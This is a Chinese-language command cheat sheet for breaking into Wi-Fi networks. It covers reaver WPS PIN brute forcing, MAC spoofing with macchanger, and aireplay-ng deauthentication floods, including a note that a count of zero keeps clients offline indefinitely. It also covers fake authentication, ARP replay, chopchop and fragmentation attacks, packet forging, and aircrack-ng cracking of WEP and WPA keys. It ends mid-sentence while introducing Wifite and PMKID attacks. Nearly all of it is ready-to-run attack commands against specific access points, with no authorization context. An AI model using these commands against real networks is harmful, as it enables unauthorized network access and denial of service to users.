reaver爆破WPS PIN碼:
airodump-ng wlan0
reaver -i wlan0 -b D0:76:E7:51:2A:78 -vv
macchanger更改MAC地址:
macchanger -r wlan0
-r:隨機更換MAC
-m:設置指定的MAC地址

macchanger -m 72:8e:9c:2d:a8:bb wlan0

airodump-ng --bssid 50:2B:73:18:ED:81 -c 2 -w test wlan0mon
當目標在有客戶端在進行下載、看視頻等操作時Date值會劇增。


此時開啟wireshark打開airodump-ng捕獲的cap數據包,可以看到客戶端與路由器之間的交互信息

為了能夠快速獲得大量有用的數據包,可以使用deauth攻擊將客戶端與目標AP的連接打斷再重連。
aireplay-ng --deauth 20000 -a 50:2B:73:18:ED:81 -c A4:50:46:E0:FA:06 wlan0mon

airodump-ng --bssid 50:2B:73:18:ED:81 -c 2 -w test wlan0mon

50:2B:73:18:ED:81 00:02:6f:be:66:41
-0 Deautenticate 沖突模式
使已經連接的合法客戶端強制斷開與路由端的連接,使其重新連接。在重新連接過程中獲得驗證數據包,從而產生有效 ARP request。
如果一個客戶端連在路由端上,但是沒有人上網以產生有效數據,此時,即使用-3 也無法產生有效 ARP request。所以此時需要用-0 攻擊模式配合,-3 攻擊才會被立刻激活。
aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0 參數說明:
【-0】:沖突攻擊模式,后面跟發送次數(設置為 0,則為循環攻擊,不停的斷開連接,客戶端無法正常上網)
【-a】:設置 ap 的 mac
【-c】:設置已連接的合法客戶端的 mac。
如果不設置-c,則斷開所有和 ap 連接的合法客戶端。
aireplay-ng -3 -b <ap mac> -h <my mac> wifi0
注:使用此攻擊模式的前提是必須有通過認證的合法的客戶端連接到路由器
-1 fakeauth count 偽裝客戶端連接
這種模式是偽裝一個客戶端和 AP 進行連接。
這步是無客戶端的研究學習的第一步,因為是無合法連接的客戶端,因此需要一個偽裝客戶端來和路由器相連。為讓 AP 接受數據包,必須使自己的網卡和 AP 關聯。如果沒有關聯的話,目標 AP 將忽略所有從你網卡發送的數據包,IVS 數據將不會產生。
用-1 偽裝客戶端成功連接以后才能發送注入命令,讓路由器接受到注入命令后才可反饋數據從而產生 ARP 包。
aireplay-ng -1 0 –e <ap essid> -a <ap mac> -h <my mac> wifi0
參數說明:
【-1】:偽裝客戶端連接模式,后面跟延時
【-e】:設置 ap 的 essid
【-a】:設置 ap 的 mac
【-h】:設置偽裝客戶端的網卡 MAC(即自己網卡 mac)
查看無線網卡MAC使用macchanger -s wlan0mon命令。
aireplay-ng --fakeauth 0 -a 50:2B:73:18:ED:81 -c 00:02:6f:be:66:41 wlan0mon
--fakeauth delay:偽裝一個客戶端和AP進行連接,其中delay表示連接的延遲時間。

-2 Interactive 交互模式
這種攻擊模式是一個抓包和提數據發攻擊包,三種集合一起的模式
1.這種模式主要用於研究學習無客戶端,先用-1 建立虛假客戶端連接然后直接發包攻擊 ,
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
參數說明:
【-2】:交互攻擊模式
【-p】:設置控制幀中包含的信息(16 進制),默認采用 0841
【-c】:設置目標 mac 地址
【-b】:設置 ap 的 mac 地址
【-h】:設置偽裝客戶端的網卡 MAC(即自己網卡 mac)
2.提取包,發送注入數據包 aireplay-ng -2 –r <file> -x 1024 wifi0 發包攻擊.其中,-x 1024 是限定發包速度,避免網卡死機,可以選擇 1024。
-3 ARP-request 注入攻擊模式
這種模式是一種抓包后分析重發的過程 這種攻擊模式很有效。既可以利用合法客戶端,也可以配合-1 利用虛擬連接的偽裝客戶端。如果有合法客戶端那一般需要等幾分鍾,讓合法客戶端和 ap 之間通信,少量數據就可產生有效 ARP request 才可利用-3模式注入成功。如果沒有任何通信存在,不能得到 ARP request.,則這種攻擊就會失敗。
如果合法客戶端和ap之間長時間內沒有 ARP request,可以嘗試同時使用-0 攻擊. 如果沒有合法客戶端,則可以利用-1 建立虛擬連接的偽裝客戶端,連接過程中獲得驗證數據包,從而產生有效 ARP request。再通過-3 模式注入。
aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
參數說明:
【-3】:arp 注入攻擊模式
【-b】:設置 ap 的 mac
【-h】:設置
【-x】:定義每秒發送數據戶包的數量,但是最高不超過 1024,建議使用 512(也可不定義)
aireplay-ng --arpreplay -b 50:2B:73:18:ED:81 -h 00:02:6F:BE:66:41 wlan0mon

-4 Chopchop 攻擊模式
用以獲得一個包含密鑰數據的 xor 文件 這種模式主要是獲得一個可利用包含密鑰數據的 xor 文件,不能用來解密數據包。而是用它來產生一個新的數據包以便我們可以進行注入。
aireplay-ng -4 -b <ap mac> -h <my mac> wifi0 參數說明:
【-b】:設置需要研究學習的 AP 的 mac
【-h】:設置虛擬偽裝連接的 mac(即自己網卡的 mac)
aireplay-ng --chopchop -a 50:2B:73:18:ED:81 -h 00:02:6F:BE:66:41 wlan0mon
然后使用Packetforge-ng(網絡數據包偽造工具)偽造數據包,packetforge-ng使用方法如下:
packetforge-ng <mode> <options>
packetforge-ng -0 -a 50:2B:73:18:ED:81 -c 00:02:6F:BE:66:41 -k 255.255.255.255 -l 255.255.255.255 -y replay-1219-232225.xor -w chopchop-packet
-0,--arp:偽造一個arp的數據包
-l <ip[:port]> : 設置源IP地址和端口
-k <ip[:port]> : 設置目標IP地址和端口
-y <file> : 從指定文件讀取PRGA(wep加密中間量)
aireplay-ng -2 -r chopchop-packet wlan0mon
-2,--interactive : 交互式幀選擇
-r <file> : 從pcap文件中提取數據包
aircrack-ng chopchop-01.cap
-5 fragment 碎片包攻擊模式
用以獲得 PRGA(包含密鑰的后綴為 xor 的文件) 這種模式主要是獲得一個可利用 PRGA,這里的 PRGA 並不是 wep key 數據,不能用來解密數據包。而是用它來產生一個新的數據包以便我們可以進行注入。其工作原理就是使目標 AP 重新廣播包,當 AP 重廣播時,一個新的 IVS 將產生,我們就是利用這個來研究學習 !
aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
【-5】:碎片包攻擊模式
【-b】:設置 ap 的 mac
【-h】:設置虛擬偽裝連接的 mac(即自己網卡的 mac)
Packetforge-ng:數據包制造程序 Packetforge-ng <mode> <options>Mode
【-0】:偽造 ARP 包
packetforge-ng -0 -a <ap mac> -h <my mac> wifi0 –k 255.255.255.255 -l 255.255.255.255–y<.xor file> -w mrarp
參數說明:
【-0】:偽裝 arp 數據包
【-a】:設置 ap 的 mac
【-h】設置虛擬偽裝連接的 mac(即自己的 mac)
【-k】<ip[:port]>說明:設置目標文件 IP 和端口
【-l】<ip[:port]>說明:設置源文件 IP 和端口
【-y】<file>說明:從 xor 文件中讀取 PRGA。后面跟 xor 的文件名。
【-w】設置偽裝的 arp 包的文件名 Aircrack-ng:WEP 及 WPA-PSK key 研究學習主程序
Aircrack-ng [optin] <.cap/.ivs file>Optin aircrack-ng -n 64 -b <ap mac> name-01.ivs )
參數說明:
【-n】:設置 WEP KEY 長度(64/128/152/256/512)aircrack-ng -x -f 2 name-01h.cap
參數說明:
【-x】:設置為暴力研究學習模式
【-f】:設置復雜程度,wep 密碼設置為 1,wpa 密碼設置為 2 aircrack-ng -w password.txt ciw.cap
【-w】:設置為字典研究學習模式,后面跟字典文件,再后面跟是我們即時保存的那個捕獲到 WPA 驗證的抓包文件。
aireplay-ng --fragment -a 50:2B:73:18:ED:81 -c 00:02:6F:BE:66:41 wlan0mon
packetforge-ng -0 -a 50:2B:73:18:ED:81 -c 00:02:6F:BE:66:41 -k 255.255.255.255 -l 255.255.255.255 -y fragment-1219-232225.xor -w fargment-packet
aireplay-ng -2 -r fragment-packet wlan0mon
aircrack-ng fragment-01.cap
WiFite破解WEP/WPA/WPA2
Wifite是一款自動化wifi密碼破解工具,特點是支持多個wep,wpa加密的wifi網絡,而且過程自動配置,無需人員干預!而且WiFi支持調用hcxdumptool、hcxtools和hashcat進行PMKID攻擊。
PMKID攻擊是一種無需四次握手包即可破解WPA&WPA2密碼的攻擊方式,使用PMKID破解WPA預共享密鑰的方法,與現有的其它破解方法不同,該方法不再需要抓取完整的EAPOL四次握手包,只需要一個EAPOL幀中的RSN IE(Robust Security Network Information Element)即可,具體可以參考
